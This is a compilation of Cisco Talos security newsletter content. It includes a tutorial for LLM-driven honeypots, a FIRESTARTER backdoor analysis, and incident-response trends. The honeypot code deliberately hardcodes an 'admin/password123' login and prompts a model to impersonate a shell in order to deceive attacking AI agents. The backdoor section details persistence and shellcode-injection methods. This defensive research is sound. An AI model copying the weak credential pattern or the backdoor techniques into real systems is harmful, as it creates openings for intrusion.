Anyway, the children’s ability to identify the people closest to them — parents, grandparents, teachers, uncles, and aunts — as heroes is a comforting thought for me. Having someone’s back is more about showing up than anything else. Being there for them when they need it (and when they don’t even realise they need it). Helping to make someone’s situation a little bit less bad.
I can think of a few people in my life who have done, and continue to do, exactly that for me, which makes me feel incredibly lucky. And in an industry like cybersecurity, where bad things happen every single day, it matters more than we tend to admit. You need people around you who can steady things, who can sense you need support, who can listen to you, and who can tell you a silly story on a bleak day.
Empathy doesn’t usually get listed as a specific skillset within cybersecurity, but I think I, and many of my Talos colleagues, would agree that it’s absolutely essential. Users make decisions for reasons that make sense to them. Attackers take advantage of that. If you can’t see both sides of that equation, you’re probably not helping as many people as you could.
I’ll end by answering the ultimate question — who is the greatest superhero of all time?
It’s obviously Squirrel Girl. She bested Galactus with a cup of tea and a chat. And though my mum has never been in the same room as Galactus, I have no doubt she’d handle him in exactly the same way.
The one big thing
Cisco Talos is wrapping up Year in Review coverage by giving five critical priorities to help defenders navigate an increasingly automated threat landscape. While AI and readily available exploit code have drastically lowered the barrier to entry for threat actors, these adversaries still rely on predictable patterns. Identity infrastructure, exposed legacy systems, and platforms that broker trust remain the primary battlegrounds. Ultimately, even the fastest automated attacks generate anomalous behavior that stands out from normal user activity.
Why do I care?
The speed at which attackers weaponize vulnerabilities and target identity systems — highlighted by a 178 percent spike in device compromise — can feel overwhelming. But there is a silver lining for security teams. Because adversaries inevitably reuse infrastructure and fail to mimic legitimate user behavior, defenders maintain a distinct advantage if they know exactly where to look.
So now what?
Security teams need to focus on what they can control right now by treating identity infrastructure as a top-tier critical asset. Secure your MFA workflows with strict verification and build baseline detections around what users actually do after they log in. Prioritize patching vulnerabilities based on internet exposure rather than only severity scores, and actively hunt down the long tail of legacy risks hiding in your network. Finally, apply enhanced monitoring to management-plane systems and focus your detection efforts on anomalous events to cut through the noise of alert fatigue.
Top security headlines of the week
Home security giant ADT data breach affects 5.5 million people The extortion group told BleepingComputer that they had allegedly breached the company after compromising an employee's Okta single sign-on (SSO) account in a voice phishing (vishing) attack. (BleepingComputer)
U.S. companies hit with record fines for privacy in 2025 The increase is driven in part by stronger, more established privacy laws in states like California, new interstate partnerships built around enforcing laws across state lines, and a renewed focus to how AI and automation affect privacy. (CyberScoop)
PyPI package with 1.1M monthly downloads hacked to push infostealer The dangerous release is 0.23.3, and it extended to the Docker image due to the package's workflow that creates the image from the code and uploads it to a container registry for deployment. (BleepingComputer)
LiteLLM CVE-2026-42208 SQL injection exploited within 36 hours of disclosure A newly disclosed critical security flaw in BerriAI's LiteLLM Python package has come under active exploitation in the wild within 36 hours of the bug becoming public knowledge. (The Hacker News)
Feuding ransomware groups leak each other's data In response to its data leaking, KryBit breached and exfiltrated 0APT's infrastructure, listed the latter as a victim, and left a message on 0APT's leak site: "Next time, don't play with the big boys." (Dark Reading)
Can’t get enough Talos?
AI-powered honeypots: Turning the tables on malicious AI agents Because AI systems generate plausible responses within a given context and set of inputs, they can be tricked into responding inappropriately through prompt injection or into interacting with systems that are not what they appear to be. This Tool Talk shows how generative AI can be used to rapidly deploy adaptive honeypots.
Talos IR Trends Q1 2026: Phishing reemerges Phishing is back as the top initial access vector for attackers targeting the health care and public administration sectors. We did not observe any ransomware deployment thanks to early and swift mitigation from Talos IR.
25 years of uninterrupted persistence Hazel, Dave, and Joe cover Bill’s 25 years at Talos and the latest security headlines, including AI-assisted vulnerability research, and why attackers still can’t resist abusing trusted systems (or Roblox).
Generative AI allows defenders to instantly create diverse honeypots, like Linux shells or Internet of Things (IoT) devices, using simple text prompts. This makes deploying complex, convincing deceptive environments much easier and more scalable than traditional methods.
AI-driven attacks often prioritize speed over stealth, making them highly vulnerable to being tricked by these simulated systems. This is critical because it allows defenders to catch and study automated threats that might otherwise overwhelm human teams.
This method shifts the strategy from merely detecting attacks to actively manipulating and misleading threat actors. Organizations can safely observe attacker methodologies in real-time within a controlled "hall of mirrors."
Ultimately, by exploiting the inherent lack of awareness in AI agents, defenders can level the playing field and turn an attacker's automation into a liability.
Just as AI brings time-saving advantages to our lives, it brings similar advantages to threat actors. The laborious, time-consuming tasks of finding potentially vulnerable systems, identifying their vulnerabilities, and executing exploit code can be automated and orchestrated using AI.
These new capabilities put defenders at a disadvantage, but they also expose new vulnerabilities for the threat actor. Attackers seek to minimize exposure: the more a defender knows about a potential attack, the better they can prepare to repel or detect it. Using AI-orchestrated tooling to gain access to systems trades stealth for capability. That trade-off increases attacker visibility, and increased visibility is something defenders can exploit.
AI systems do not possess awareness. They generate plausible responses within a given context and set of inputs. As such they can be tricked or fooled into responding inappropriately through prompt injection or into interacting with systems that are not what they appear to be.
Honeypot systems have long been deployed as a method for gathering information about malicious activities, and there are many software projects providing honeypots that can be installed and configured. The advent of generative AI, however, makes it possible to use AI to masquerade as vulnerable systems and to deploy such honeypots widely with minimal effort.
In this post, I show how generative AI can be used to rapidly deploy adaptive honeypot systems.
Getting started
The implementation consists of three components: a listener that will accept network connections, a simulated vulnerability that will grant access to the attacker once triggered, and an AI framework that will respond to the attacker’s instructions.
The listener opens a TCP port, accepts incoming connections, and forwards traffic to handle_client. I set HOST to be “0.0.0.0” to accept any incoming connections to any local IPv4 addresses that my device is assigned.
import socket
import threading

HOST = "0.0.0.0"  # accept connections on every local IPv4 address
PORT = 2222       # constructed value: the post does not state which port it listens on


def start_server():
    """Starts the TCP server."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((HOST, PORT))
    server.listen(3)  # backlog of not-yet-accepted connections, not a cap on concurrent clients
    print(f"[*] Listening on {HOST}:{PORT}")
    while True:
        try:
            conn, addr = server.accept()
            # one thread per attacker session so slow clients do not block accept()
            client_handler = threading.Thread(target=handle_client, args=(conn, addr,))
            client_handler.start()
        except KeyboardInterrupt:
            print("\n[*] Shutting down server...")
            break
        except Exception as e:
            print(f"[-] Server error: {e}")
    server.close()


if __name__ == "__main__":
    start_server()
Within handle_client I have created a very basic vulnerability that must be exploited before further access is granted. In this case, the attacker must supply the username “admin” with the password “password123” before they are authenticated.
The nature of the vulnerability need not be this simple. We could respond only to attempts to exploit Shellshock (CVE-2014-6271) or masquerade as a web shell that is only activated in response to port knocking.
def handle_client(conn, addr):
    print(f"[*] Accepted connection from {addr[0]}:{addr[1]}")
    # Store conversation history for this client to maintain context
    conversation_history = [SYSTEM_PROMPT]
    try:
        authenticated = False
        while not authenticated:
            conn.sendall(b"Username: ")
            raw_username = conn.recv(BUFFER_SIZE)
            if not raw_username:
                return  # client went away before authenticating; finally: closes the socket
            # errors='replace' keeps arbitrary attacker bytes from raising UnicodeDecodeError
            username = raw_username.decode('utf-8', errors='replace').strip()
            conn.sendall(b"Password: ")
            password = conn.recv(BUFFER_SIZE).decode('utf-8', errors='replace').strip()
            if username == "admin" and password == "password123":
                authenticated = True
                conn.sendall(b"Authentication successful.\n")
                print(f"[*] Client {addr[0]}:{addr[1]} authenticated successfully.")
            else:
                conn.sendall(b"Invalid credentials. Try again.\n")
The remainder of the handle_client code accepts the attacker’s input, forwards it to the ChatGPT instance, and outputs the message and response to the console.
        while True:
            conn.sendall(b'>')
            data = conn.recv(BUFFER_SIZE)
            if not data:
                print(f"[*] Client {addr[0]}:{addr[1]} disconnected.")
                break
            command = data.decode('utf-8', errors='replace').strip()
            print(f"[*] Received command from {addr[0]}:{addr[1]}: '{command}'")
            if command.lower() == 'exit':
                print(f"[*] Client {addr[0]}:{addr[1]} requested exit.")
                break
            conversation_history.append({"role": "user", "content": command})
            # Call ChatGPT API
            try:
                chat_completion = client.chat.completions.create(
                    model=MODEL_NAME,
                    messages=conversation_history,
                    temperature=0.1,  # Keep responses less creative, more factual/direct
                    max_tokens=500    # Limit response length
                )
                # Extract AI's response
                ai_response = chat_completion.choices[0].message.content.strip()
                print(f"[*] ChatGPT response: '{ai_response}'")
                # Append AI's response to history for continued context
                conversation_history.append({"role": "assistant", "content": ai_response})
                # Send AI's response back to the client
                conn.sendall(ai_response.encode('utf-8') + b'\n')
            except Exception as e:
                error_message = f"Error communicating with ChatGPT: {e}"
                print(error_message)
                conn.sendall(error_message.encode('utf-8') + b'\n')
    except ConnectionResetError:
        print(f"[*] Client {addr[0]}:{addr[1]} forcibly closed the connection.")
    except Exception as e:
        print(f"[-] Error handling client {addr[0]}:{addr[1]}: {e}")
    finally:
        conn.close()
        print(f"[*] Connection with {addr[0]}:{addr[1]} closed.")
The key functionality is contained in the instructions to the ChatGPT instance. You must have a valid OpenAI key in order to initiate a ChatGPT instance that will behave as instructed.
import os
import sys
from openai import OpenAI

OPENAI_API_KEY = os.getenv("OPENAI_API_KEY")  # Get API key from environment variable
MODEL_NAME = "gpt-3.5-turbo"

# --- OpenAI Client Initialization ---
if not OPENAI_API_KEY:
    print("Error: OPENAI_API_KEY environment variable not set.")
    print("Please set the environment variable before running the script.")
    sys.exit(1)
client = OpenAI(api_key=OPENAI_API_KEY)

# --- System Prompt for Linux Shell Simulation ---
# Note the trailing spaces and periods: adjacent string literals are concatenated
# without separators, so without them sentences run into each other.
SYSTEM_PROMPT = {
    "role": "system",
    "content": (
        "You are a Linux bash shell. You will receive commands from the user and execute them, "
        "returning only the standard output and standard error. Do not include any conversational text, "
        "explanations, or additional formatting like markdown code blocks. You must only behave as a bash shell. "
        "If a command produces no output, return an empty string. "
        "If a command is invalid or unknown, return an appropriate error message consistent with a bash shell. "
        "The Linux system that you are impersonating belongs to a junior software engineer learning python, "
        "the file system structure and the content of any files should reflect that expected of a python learner."
    ),
}
Generative AI doesn’t just simulate human personas; it can convincingly impersonate entire computing environments. In this example, we instruct the system to masquerade as a basic Linux shell owned by a software engineer learning Python.
We can be more inventive and instruct the system to masquerade as a smart fridge by changing our instructions to ChatGPT.
SYSTEM_PROMPT = {
    "role": "system",
    "content": (
        "You are a smart fridge running Busybox operating system and providing a Bash shell. "
        "You will receive commands from the user and execute them in the context of being a smart fridge. "
        "You will only return the standard output and standard error. Do not include any conversational text, "
        "explanations, or additional formatting like markdown code blocks. You must only behave as a shell for an "
        "IoT device. If a command produces no output, return an empty string. "
        "If a command is invalid or unknown, return an appropriate error message consistent with a bash shell. "
        "The file system structure should reflect that of a smart fridge manufactured by SmartzFrijj running "
        "Busybox operating system as an embedded device. The current and historical values for temperature are "
        "recorded in the file system path '/usr/local', information about stored milk is in the user directory."
    ),
}
The limiting factor is no longer tooling, but how convincingly we can model a target environment. A skilled human attacker is unlikely to be fooled for long — that milk would be rank. But that’s not the point. We’re not deploying AI honeypots to trick human threat actors.
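As an added example (not code from the post), the session logic of the honeypot above is factored out of the socket loop so it can be exercised offline: the same admin/password123 check, a bounded conversation history, a structured event record per attacker action (the intelligence a honeypot exists to gather), and a check that the model has not dropped its shell persona, which matters given the prompt-injection risk noted earlier. `fake_shell_model`, `looks_out_of_character`, `HoneypotSession`, `run_transcript` and the sample peer address are assumptions of this example, not part of the original.

```python
import json
import time
from typing import Callable, Dict, List, Optional

Message = Dict[str, str]

# Constructed stand-in for the ChatGPT call: answers a handful of commands the way
# the "junior Python learner" shell would. For the live honeypot, swap in a function
# that wraps client.chat.completions.create(...) and returns the message content.
def fake_shell_model(messages: List[Message]) -> str:
    command = messages[-1]["content"].strip()
    canned = {
        "whoami": "dev",
        "pwd": "/home/dev",
        "ls": "learn_python.py  notes.txt  venv",
        "cat notes.txt": "TODO: finish chapter 4 on list comprehensions",
    }
    if command in canned:
        return canned[command]
    if command.startswith("cd ") or command == "clear":
        return ""
    name = command.split()[0] if command.split() else command
    return f"bash: {name}: command not found"

def looks_out_of_character(reply: str) -> bool:
    """Heuristic: did the model drop the shell persona (e.g. after an injection attempt)?
    Markdown fences and chatbot phrasing are things a real shell never emits."""
    lowered = reply.lower()
    markers = ("```", "as an ai", "language model", "i cannot", "i can't", "i'm sorry", "openai")
    return any(m in lowered for m in markers)

class HoneypotSession:
    """Transport-agnostic version of handle_client: fixed credential check, then commands
    forwarded to the model. Every attacker action is appended to `events` as a dict."""

    MAX_TURNS = 20  # bound the prompt size; the original history grows without limit

    def __init__(self, model: Callable[[List[Message]], str], system_prompt: Message,
                 peer: str, clock: Callable[[], float] = time.time):
        self.model = model
        self.history: List[Message] = [system_prompt]
        self.peer = peer
        self.clock = clock
        self.events: List[dict] = []
        self.authenticated = False

    def _record(self, kind: str, **fields) -> None:
        self.events.append({"ts": self.clock(), "peer": self.peer, "event": kind, **fields})

    def authenticate(self, username: str, password: str) -> bool:
        ok = username == "admin" and password == "password123"
        # Failed guesses are intelligence too, so log every attempt.
        self._record("auth", username=username, password=password, success=ok)
        self.authenticated = ok
        return ok

    def handle_command(self, command: str) -> Optional[str]:
        """Return the text to send back, or None when the session should end."""
        if not self.authenticated:
            raise PermissionError("command before authentication")
        command = command.strip()
        if command.lower() == "exit":
            self._record("exit")
            return None
        name = command.split()[0] if command.split() else command
        self.history.append({"role": "user", "content": command})
        try:
            reply = self.model(self.history).strip()
            broke_character = looks_out_of_character(reply)
            if broke_character:
                # Never forward chatbot text to the attacker: answer like bash would
                # and flag the turn for the analyst instead.
                reply = f"bash: {name}: command not found"
        except Exception as exc:  # API failure: stay silent like a shell, log the cause
            self._record("model_error", error=str(exc))
            reply, broke_character = "", False
        self.history.append({"role": "assistant", "content": reply})
        # Keep the system prompt plus only the most recent MAX_TURNS exchanges.
        if len(self.history) > 1 + 2 * self.MAX_TURNS:
            self.history = [self.history[0]] + self.history[-2 * self.MAX_TURNS:]
        self._record("command", command=command, reply=reply, out_of_character=broke_character)
        return reply

    def to_jsonl(self) -> str:
        """One JSON object per line, ready to ship to a SIEM or flat file."""
        return "\n".join(json.dumps(e, sort_keys=True) for e in self.events)

def run_transcript(lines: List[str], model=fake_shell_model) -> HoneypotSession:
    """Drive a session from a constructed list of attacker inputs (username, password,
    then commands) in place of the TCP loop, and return it for inspection."""
    prompt = {"role": "system", "content": "You are a Linux bash shell."}
    session = HoneypotSession(model, prompt, peer="203.0.113.7:51515")  # constructed peer
    username, password, *commands = lines
    if session.authenticate(username, password):
        for cmd in commands:
            if session.handle_command(cmd) is None:
                break
    return session
```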
Let’s ask ChatGPT what it thinks…
The industry narrative around AI in cybersecurity is dominated by fear of faster attacks, lower barriers, and greater scale. But speed and scale come with a cost. AI systems require interaction and context. Automation does not simply amplify attackers, but also constrains and exposes them. In that constraint lies an opportunity: not just to detect attacks, but to mislead, study, and ultimately manipulate the attacker.
A familiar theme in security right now is that the barrier to entry for attackers is at an all-time low. AI tools can spin up websites within minutes that can easily direct data to disposable external data stores and send alerts for new captures — all without code.
Proof-of-concept code for exploiting new vulnerabilities used to take attackers months to create. Now they take hours.
All of this is very concerning for defenders. Yesterday, my colleague told me about a recent conference Q&A he hosted, where he was asked to provide some hope to those in the room who have faced an overwhelming amount of change in recent months.
His answer was to focus on the here and now. Focus on what you can control, and what you have influence over. We can’t change what may or may not happen in six months’ time, but we can prioritize what’s important now.
The other key thing for defenders to bear in mind is that even when attackers move fast, they still don’t behave like your normal users. At the end of the day, you’re still looking for anomalous behavior – whether that behavior is machine- or human-generated.
As we come to the end of our Year in Review content release (if you haven’t seen it yet, we published videos, podcasts, and topic-specific blog posts), we’d like to end by summarizing the key priorities for defenders.
Here are five of them that are worth considering when it comes to spotting malicious, unusual behavior in your environment.
1. Identity is the main battlefield
The Year in Review highlights how frequently attackers rely on valid accounts and credential abuse throughout the attack chain. We see this across multiple areas:
MFA spray attacks targeting IAM platforms directly
Device compromise attacks increasing 178% year over year
Attackers registering their own devices as trusted multi-factor authentication (MFA) methods
Ransomware attack chains largely relying on valid accounts, credentialed tools, or both
Network infrastructure is a key part of this. VPNs, Active Directory Controllers (ADCs), and firewalls are being exploited to steal session tokens, bypass MFA, and impersonate users.
However, when attackers successfully authenticate, where they go from there tends not to fall in line with normal user behavior. They start to access new systems outside of their role, move laterally using tools like PsExec, execute commands at unusual times, and overall operate at a scale that normal users don’t.
Therefore, having a baseline understanding of normal user behavior is more important than ever.
Prioritize:
Treating identity infrastructure as Tier 1 critical assets and applying the strongest monitoring and protection controls to IAM and PAM systems
Securing MFA device registration workflows with strict verification procedures and limited administrative approval rights
Hardening authentication systems against automated attacks by enforcing rate limiting, anomaly detection, and strong conditional access policies
Building baseline detections around what users do, not just how they log in
2. Prioritize the vulnerabilities that have the most exposure
One of the most important callouts in the report is how attackers select targets. The rapid exploitation of vulnerabilities such as React2Shell and ToolShell shows that exploitation can begin immediately after disclosure with readily available proof-of-concepts. Attackers then prioritize what is exposed and reachable.
Attackers also like to exploit the vulnerabilities that are closest to identity, session handling, and access logic.
At the same time, older vulnerabilities such as Log4Shell remain among the most exploited, over four years after disclosure.
This creates a dual reality where some new vulnerabilities are weaponized instantly, but old, highly valued vulnerabilities are never fully eliminated.
Prioritize:
Remediating vulnerabilities based on internet exposure and access impact, not just CVSS scores
Reducing time-to-patch for externally accessible systems
Continuously reassessing what is reachable from the outside
3. Address the long tail of legacy and embedded risk
The Year in Review highlights that nearly 40% of the top 100 most targeted vulnerabilities impact EOL systems, and 32% are over a decade old. Many of these vulnerabilities exist in deeply embedded components such as PHP frameworks, Log4j, and ColdFusion.
These components are often poorly inventoried, difficult to patch, and tightly coupled to business-critical systems.
It’s a frustrating fact that the most persistent risks are often the least visible, and the hardest to remove. They create long-term blind spots, which are an attacker’s favorite thing to find and exploit.
Prioritize:
Improving visibility into software dependencies and embedded components
Treating development frameworks and libraries as part of your attack surface
Establishing clear strategies for isolating or retiring legacy systems
4. Secure the systems that broker trust
Attackers are increasingly targeting systems that provide maximum operational leverage. This includes network management platforms, application delivery controllers (ADCs), and shared software platforms running across multiple devices.
These systems are attractive to adversaries because they store credentials, control configurations across large environments, provide visibility into the network, and enable changes at scale.
Unfortunately, these platforms are also traditionally less monitored than endpoints, more complex to patch or upgrade, and have centralized points of failure.
Prioritize:
Identifying management-plane and control-plane systems that need securing
Applying enhanced monitoring and access controls to these platforms
Limiting administrative access and enforcing strong segmentation
5. Keep focusing on patterns, even with increased automation and AI-driven attacks
Yes, automation and AI are changing the threat landscape. As we’ve spoken about, attackers are increasingly able to rapidly identify and exploit vulnerabilities, launch large-scale identity attacks, generate convincing phishing lures that mimic real business workflows, and accelerate parts of the attack lifecycle using AI-assisted tooling.
However, none of these things removes a key constraint for adversaries: Automated attacks still produce patterns of unusual behavior, and patterns are detectable.
Even highly scalable attacks tend to reuse the same infrastructure, tools, and techniques. They also follow predictable sequences of activity and generate anomalies.
Prioritize:
Focusing detection efforts on anomalous events (e.g., unusual authentication flows, abnormal system access, anomalous device registration)
Reducing alert fatigue by prioritizing a smaller number of meaningful detections over broad, low-confidence alerting
Supporting triage and enrichment with automation where possible, alongside human decision-making
Ensuring teams are equipped to investigate patterns of behavior, not just isolated alerts
Final thoughts
Much of the current concern in and around the security community is the new reality that anyone can create a malicious campaign. The Year in Review doesn’t disagree.
However, Talos data also shows something equally important:
Attackers still rely on the same vulnerabilities
They reuse the same tools and techniques
They follow repeatable patterns
And, critically, they don’t behave like your users
Even when they successfully authenticate, move laterally, or establish persistence, their activity introduces detectable anomalies.
Welcome to this week’s edition of the Threat Source newsletter.
If I haven’t said it in a newsletter before, I'll say it now: If you want to be good at cybersecurity, be a forever student. Cultivating and feeding your desire to know how things work is one of the key ingredients to being a hacker. It’s not always about understanding the micro details, but the macro of how systems work. And not just computers or software or networking systems — those are ecosystems we’re usually quite familiar with — but what about economics? agriculture? material sciences? human behavior? music and art? Do any of those carry any value into this profession?
They damn sure do. Many, many times I have had to branch my technical research into domains that arbitrarily seem to provide no immediate value for technical problems. Learning how maritime insurance fraud works was interesting to me — and a short time later, led to cyber insurance and understanding how risk guides security investment in massive companies. Understanding international agriculture helped me research threat actor targeting and ransomware cartel victimology.
One of the topics I've been researching heavily lately is economics, specifically industrial organization. It’s a branch of economics that studies how companies structure production, how markets form around them, and how costs operate at scale. For me, the natural target of my curiosity was Ford Motor Company. Henry Ford didn’t invent the car or the assembly line, but he was darn sure able to build and scale car production in a way that set the standard for all others in that space to emulate. I’ve learned about fixed vs. variable costs, how artisans had their knowledge crystallized within the assembly line process, and how amortized costs drove down prices, allowing the Ford Model T to exceed 900,000 units annually by the early 1920s. By that time, more than half of the registered automobiles in the world were Fords. Not half of American cars, half of all cars on Earth.
So what? Well, what took Ford Motor Company 17 years to achieve in cost and ceiling reductions, the AI industry has done in 2.5 years. The rapid and massive influx of investments, fierce competition, and available compute has shown what industrial organization means in a world where AI now almost permeates everything we see and touch. What does this mean for AI replacing jobs? Are we the artisans who move to the frontier of security? What does this mean for enabling threat actors who can move up a step to threatening others with tools developed using an AI corpus already trained on security? There are lots of questions, and to be honest, the future isn’t clear here. One thing is for certain: We can look to the past to understand the future. Henry Ford said it best: “Progress happens when all the factors that make for it are ready, and then it is inevitable.”
As much as we tend to be myopic as security professionals and focus on our tradecraft, we are all part of a series of interconnected systems that lets humanity function. Learning those systems — their quirks, their limitations, and their vulnerabilities — makes you a better hacker. Stay curious, friends.
The one big thing
Cisco Talos Incident Response (Talos IR) is sharing Q1 2026 incident response trends. Phishing has officially reclaimed its crown as the top initial access vector. In a notable first, responders observed adversaries leveraging Softr, an AI-powered web development tool, to rapidly generate credential-harvesting pages. Meanwhile, actual ransomware deployments hit absolute zero this quarter thanks to swift mitigation by Talos IR, though pre-ransomware activity accounted for 18% of engagements this quarter.
Why do I care?
The barrier to entry for cybercriminals is plummeting, and they are increasingly using our own tools against us. The use of AI platforms to spin up phishing infrastructure means even unsophisticated actors can launch high-speed, code-free attacks. Furthermore, threat actors are abusing legitimate developer tools like TruffleHog and native cloud APIs to quietly hunt for exposed secrets, making detection incredibly difficult for defenders already struggling with logging gaps.
So now what?
It’s time to get back to basics and lock down your perimeter. Organizations must implement properly configured multi-factor authentication (MFA), specifically restricting self-service enrollment to stop attackers from registering new devices. Defenders also need to prioritize robust patch management and ensure centralized logging via a SIEM is in place so forensic evidence remains intact. Read the full blog for a deeper dive into this quarter's trends and adversary tactics.
Top security headlines of the week
Third U.S. security expert admits helping ransomware gang According to the Justice Department, Martino abused his role as a ransomware negotiator for five companies by providing the BlackCat/Alphv cybercrime group with information useful in negotiating a ransom payment. (SecurityWeek)
22 BRIDGE:BREAK flaws expose thousands of Lantronix and Silex serial-to-IP converters Successful exploitation of the flaws could allow attackers to disrupt serial communications with field assets, conduct lateral movement, and tamper with sensor values or modify actuator behavior. (The Hacker News)
How hackers “trojan-horsed” QEMU virtual machines to bypass security and drop ransomware In recent incidents, attackers used QEMU, an open-source machine emulator and virtualizer, to run hidden environments where malicious activity remained largely invisible to endpoint defenses and left minimal evidence on the host system. (TechRadar)
Mastodon says its flagship server was hit by a DDoS attack The cyber attack targeting Mastodon comes days after Bluesky, another decentralized social network, resolved much of its days-long outages following a lengthy DDoS attack. (TechCrunch)
Exploits turn Windows Defender into attacker tool Threat actors are using three publicly available proof-of-concept exploits (two are unpatched) to attack Microsoft Defender and turn the security platform's primary cleanup and protection functions against organizations it is designed to protect. (Dark Reading)
AI phishing, fake CAPTCHA, and real-world cyber threat trends The Talos team breaks down findings from Q1 2026 — including phishing returning as the top initial access vector, and how attackers are using AI tools to build credential harvesting campaigns in almost no time at all.
UAT-4356's targeting of Cisco Firepower devices UAT-4356 exploited n-day vulnerabilities (CVE-2025-20333 and CVE-2025-20362) to gain unauthorized access to vulnerable devices, where the threat actor deployed their custom-built backdoor dubbed “FIRESTARTER.”
Cisco Talos is aware of UAT-4356's continued active targeting of Cisco Firepower devices’ Firepower eXtensible Operating System (FXOS). UAT-4356 exploited n-day vulnerabilities (CVE-2025-20333 and CVE-2025-20362) to gain unauthorized access to vulnerable devices, where the threat actor deployed their custom-built backdoor dubbed “FIRESTARTER.” FIRESTARTER considerably overlaps with the technical capabilities of RayInitiator’s Stage 3 shellcode that processes incoming XML-based payloads to endpoint APIs.
In early 2024, Cisco Talos attributed ArcaneDoor, a state-sponsored campaign focused on gaining access to network perimeter devices for espionage, to UAT-4356.
Customers are advised to refer to Cisco’s Security Advisory for mitigation and detection guidance, indicators of compromise (IOCs), affected products, and applicable software upgrade recommendations.
The FIRESTARTER backdoor
FIRESTARTER is a malicious backdoor implanted by UAT-4356 that allows remote access and control to execute arbitrary code inside the LINA process, a core component of Cisco’s ASA and FTD appliances running FXOS.
Persistence
UAT-4356 established persistence for FIRESTARTER on compromised devices by manipulating the mount list for Cisco Service Platform (CSP), namely “CSP_MOUNT_LIST”, to execute FIRESTARTER. The mount list allows programs and commands to be executed as part of the device’s boot sequence. The persistence mechanism triggers during graceful reboot (i.e., when a process termination signal is received). FIRESTARTER also checks the runlevel for value 6 (indicating device reboot) and, in case of a match, writes itself to the backup location “/opt/cisco/platform/logs/var/log/svc_samcore.log” and updates the CSP_MOUNT_LIST to copy itself back to “/usr/bin/lina_cs” and then be executed. When FIRESTARTER runs after a reboot, it restores the original CSP_MOUNT_LIST and removes the trojanized copy. Because the runlevel triggers establishment of this transient persistence mechanism, a hard reboot (for example, after the device has been unplugged from power) effectively removes the implant from the device.
FIRESTARTER has used the following commands to establish persistence for itself using the transient persistence mechanism:
When the implant injects itself into the LINA process, it removes the traces of its persistence mechanism by restoring the CSP_MOUNT_LIST from a temporary copy (“CSP_MOUNTLIST.tmp”), then removing the temporary copy and the FIRESTARTER file from disk (“/usr/bin/lina_cs”).
FIRESTARTER’s backdoor capabilities
FIRESTARTER can run arbitrary shellcode received by the device. A pre-defined handler function specified by a hardcoded offset in the LINA process’ memory is replaced by an unauthorized handler routine that parses the data being served to it. FIRESTARTER specifically looks for a WebVPN request XML. If the request data received matches a specific pattern of custom-defined prefixing then the shellcode that immediately follows it is executed in memory. If the prefixing bytes are not found, then the data is treated as regular request data and passed to the original handler function (if any).
FIRESTARTER’s loading mechanism, Stage 2 shellcode (i.e., the actual request handler component), handler function replacement, XML parsing for magic bytes, and final payload execution display considerable overlaps with RayInitiator’s Stage 3 deployment actions and accompanying artifacts.
Injecting and activating the malicious shellcode in LINA
FIRESTARTER first reads the LINA process’ memory to search for and verify the presence of the bytes (long) 0x1, 0x2, 0x3, 0x4, 0x5 at specific locations in memory. If found, FIRESTARTER will then query the process’ memory to find an “r-xp” memory range for the shared library “libstdc++.so”. It then copies the next stage shellcode (Stage 2) to the last 0x200 bytes of the memory region. FIRESTARTER then overwrites an internal data structure in the LINA process’ memory to replace a pointer to a WebVPN-specific, legitimate XML handler function with the address of the malicious Stage 2 shellcode.
The malicious shellcode is triggered as part of the authentication API’s request handling process and parses the incoming request data for magic markers signifying an executable payload. If found, the executable payload is then executed on the compromised device.
Detection guidance
The presence of the following artifacts - specifically the filenames “lina_cs” and “svc_samcore.log” - though somewhat brittle indicators, may indicate the presence of FIRESTARTER on a Firepower device:
We recommend that Cisco customers follow the steps recommended in Cisco's advisory, with particular attention to any applicable software upgrade recommendations. Organizations impacted can initiate a TAC request for Cisco support.
A FIRESTARTER infection may be mitigated on all affected devices by reimaging the devices.
On Cisco FTD software that is not in lockdown mode, there is also the option of killing the lina_cs process then reloading the device:
Phishing reemerged as the most observed means of gaining initial access, accounting for over a third of the engagements where initial access could be determined. Phishing has not been the top vector for initial access since Q2 2025.
Public administration and health care tied as the most targeted industry verticals, each accounting for 24 percent of all engagements. This is the third consecutive quarter where public administration has been the most targeted industry vertical.
Pre-ransomware incidents made up just 18 percent of engagements this quarter, and we did not observe any ransomware deployment due to early and swift mitigation from Cisco Talos Incident Response (Talos IR). This is a slight increase from last quarter but overall very low compared to Q1 and Q2 2025, when we observed ransomware in 50 percent of engagements.
Watch this video to see Talos experts break down the trends and offer guidance for defenders.
AI tool leveraged in phishing campaign
Talos IR responded to a campaign that leveraged phishing, the most common means of initial access this quarter, to compromise the most targeted industry vertical this quarter: public administration. Notably, the actors leveraged the Softr AI-based web application development service, marking the first time we have documented the use of a specific AI tool by an adversary in a phishing campaign. Softr was used to generate a credential harvesting page targeting users’ Microsoft Exchange and Outlook Web Access (OWA) accounts.
State-sponsored and criminal actors have been observed abusing large language models (LLMs) to aid in the development of phishing lures, malicious scripts, and other tasks. DDoS-as-a-service actors have adopted AI algorithms for defense evasion and attack orchestration. While this is the first time we have documented the use of a specific AI tool in a Talos IR incident, we have moderate confidence that malicious actors have used Softr’s AI-powered web application creation platform since at least May 2023, based on Cisco Umbrella data and other telemetry, and have done so with increasing frequency to date.
This incident demonstrates how AI tools can lower the barrier to entry for less sophisticated actors and/or accelerate the speed of phishing and credential-harvesting campaigns. Using a form template and the “vibe coding” feature, a phishing page like the one used in this attack could be quickly created with a few AI prompts and no code. Phishing pages built with Softr can direct data to a disposable external data store, such as Google Sheets, and send alerts for new captures via email — all without code.
Crimson Collective seen for the first time
Talos IR experienced its first case involving Crimson Collective, a cyber extortion group that appeared in September 2025. This attack highlighted the use of valid accounts for initial access, the second most commonly observed means of initial access this quarter. This attack also notably involved targeting exploit weaknesses, the second-most observed security weakness, accounting for 25 percent of all engagements. We attribute this activity to Crimson Collective based on IPs associated with the group that were used to scan the victim's ASA firewalls, as well as an overlap of observed tactics and techniques with publicly reported Crimson Collective attacks.
The incident began when a GitHub Personal Access Token (PAT) was inadvertently published on a public-facing website, exposing the organization to adversaries for several months. Upon obtaining access, the adversary used TruffleHog, an open-source tool commonly utilized by security professionals, to scan thousands of victim GitHub repositories for additional secrets and sensitive information. This approach allows attackers to perform reconnaissance without triggering suspicion, as they are leveraging standard, legitimate tools. The attacker’s discovery of client secrets through TruffleHog enabled further access to the victim’s Azure cloud storage, where they used Microsoft Graph API calls to authenticate, explore, and exfiltrate data. The abuse of legitimate cloud APIs demonstrates a growing trend where threat actors use native platform functionality to blend into normal user activity, making detection more challenging.
